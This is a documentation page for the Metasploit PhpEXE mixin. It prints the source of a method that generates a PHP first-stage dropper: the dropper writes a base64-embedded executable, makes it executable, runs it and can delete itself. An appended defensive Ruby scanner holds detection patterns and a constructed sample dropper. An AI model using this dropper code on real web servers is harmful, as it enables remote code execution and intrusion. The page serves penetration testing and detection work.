Module: Msf::Exploit::PhpEXE
- Includes:
- EXE, Payload::Php
- Defined in:
- lib/msf/core/exploit/php_exe.rb
Instance Method Summary
- #get_write_exec_payload(opts = {}) ⇒ String
  Generate a first-stage php payload.
Methods included from Payload::Php
#php_preamble, #php_system_block
Methods included from EXE
#exe_init_options, #exe_post_generation, #generate_payload_dccw_gdiplus_dll, #generate_payload_dll, #generate_payload_exe, #generate_payload_exe_service, #generate_payload_msi, #get_custom_exe, #get_eicar_exe, #initialize
Instance Method Details
#get_write_exec_payload(opts = {}) ⇒ String
TODO:
Test on Windows
Generate a first-stage php payload.
For ARCH_PHP targets, simply returns payload.encoded wrapped in <?php ?> markers.
For target architectures other than ARCH_PHP, this will base64 encode an appropriate executable and drop it on the target system. After running it, the generated code will attempt to unlink the dropped executable which will certainly fail on Windows.
# File 'lib/msf/core/exploit/php_exe.rb', line 36

def get_write_exec_payload(opts={})
  case target_arch.first
  when ARCH_PHP
    # Native PHP payload: nothing to drop, just wrap the encoded payload.
    php = payload.encoded
  else
    # Non-PHP target: pick a random name for the dropped executable.
    bin_name = Rex::Text.rand_text_alpha(8)
    if opts[:writable_path]
      bin_name = [opts[:writable_path], bin_name].join("/")
    else
      bin_name = "./#{bin_name}"
    end
    if target["Platform"] == 'win'
      bin_name << ".exe"
      print_warning("Unable to clean up #{bin_name}, delete it manually")
    end

    # Embed the executable as base64; the PHP stage writes it out,
    # makes it executable, runs it (backgrounded on non-Windows) and unlinks it.
    p = Rex::Text.encode_base64(generate_payload_exe)
    php = %Q{
      #{php_preamble}
      $ex = "#{bin_name}";
      $f = fopen($ex, "wb");
      fwrite($f, base64_decode("#{p}"));
      fclose($f);
      chmod($ex, 0777);
      function my_cmd($cmd) {
        #{php_system_block};
      }
      if (FALSE === strpos(strtolower(PHP_OS), 'win' )) {
        my_cmd($ex . "&");
      } else {
        my_cmd($ex);
      }
      unlink($ex);
    }
  end

  if opts[:unlink_self]
    # Prepend instead of appending to make sure it happens no matter
    # what the payload normally does.
    php = "@unlink(__FILE__);" + php
  end

  # Strip comments and collapse all whitespace onto a single line.
  php.gsub!(/#.*$/, '')
  php.gsub!(/[\t ]+/, ' ')
  php.gsub!(/\n/, ' ')

  return "<?php #{php} ?>"
end
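As an added example, not code from Metasploit or this module: a small Ruby check a defender could run over PHP files in a web root to flag the first-stage shape documented above (a long base64_decode() blob written with fwrite, chmod 0777, a PHP_OS check, then unlink). The command-execution functions that php_system_block emits are not shown on this page, so the exec_call list is an assumption, and both sample inputs are constructed.

```ruby
# Indicators for the dropper shape described above. The generated stage is
# collapsed onto one line with single spaces, so every pattern is
# whitespace-tolerant rather than line-oriented.
INDICATORS = {
  base64_write: /fwrite\s*\(\s*\$\w+\s*,\s*base64_decode\s*\(\s*"[A-Za-z0-9+\/=]{64,}"\s*\)\s*\)/,
  chmod_exec:   /chmod\s*\(\s*\$\w+\s*,\s*0?777\s*\)/,
  os_check:     /strpos\s*\(\s*strtolower\s*\(\s*PHP_OS\s*\)\s*,\s*'win'/,
  unlink_drop:  /unlink\s*\(\s*\$\w+\s*\)/,
  self_delete:  /@?unlink\s*\(\s*__FILE__\s*\)/,
  # Assumption: common PHP command-execution functions; the page does not
  # list which ones php_system_block actually tries.
  exec_call:    /\b(?:system|passthru|shell_exec|exec|proc_open|popen)\s*\(/,
}.freeze

# Returns the matched indicator names and a verdict. A single base64 write is
# not enough on its own (installers do that); require the write plus at least
# two of the execution/cleanup indicators.
def score_php_dropper(src)
  hits = INDICATORS.select { |_, re| src.match?(re) }.keys
  { hits: hits, score: hits.size,
    suspicious: hits.include?(:base64_write) && hits.size >= 3 }
end

# Constructed sample mirroring the generated stage; the blob is filler, not a binary.
BLOB = "QUFB" * 30
SAMPLE_DROPPER = <<~PHP.gsub(/\s+/, " ")
  <?php $ex = "./kqzvmxwy"; $f = fopen($ex, "wb");
  fwrite($f, base64_decode("#{BLOB}")); fclose($f); chmod($ex, 0777);
  function my_cmd($cmd) { system($cmd); }
  if (FALSE === strpos(strtolower(PHP_OS), 'win' )) { my_cmd($ex . "&"); }
  else { my_cmd($ex); } unlink($ex); ?>
PHP

# Constructed benign file for comparison.
SAMPLE_BENIGN = '<?php echo "hello"; file_put_contents("log.txt", date("c")); ?>'

if __FILE__ == $PROGRAM_NAME
  [SAMPLE_DROPPER, SAMPLE_BENIGN].each { |s| p score_php_dropper(s) }
end
```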